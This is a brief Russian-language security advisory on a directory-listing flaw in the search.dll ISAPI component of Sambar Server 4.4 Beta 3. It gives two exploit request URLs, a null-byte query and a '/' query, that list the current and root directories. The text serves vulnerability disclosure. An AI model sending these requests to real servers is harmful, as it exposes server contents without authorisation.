Sambar Server поставляется вместе с некэшируемым HTTP proxy сервером и базисными SMTP, POP3 и IMAP4 proxy серверами. Хакер может использовать дырку в безопасности для просмотра содержимого сервера.

Детали:
Дырка обнаружена в Sambar Server 4.4 Beta 3

Прореха содержится в search.dll, Sambar ISAPI Search входит в состав сервера.

Exploit:
Просто передайте этот запрос на search.dll
http://www.example.com/search.dll?search?query=%00&logic=AND
покажет содержимое текущей директории
http://www.example.com/search.dll?search?query=/&logic=AND
покажет содержимое root-директории сервера



Оставить мнение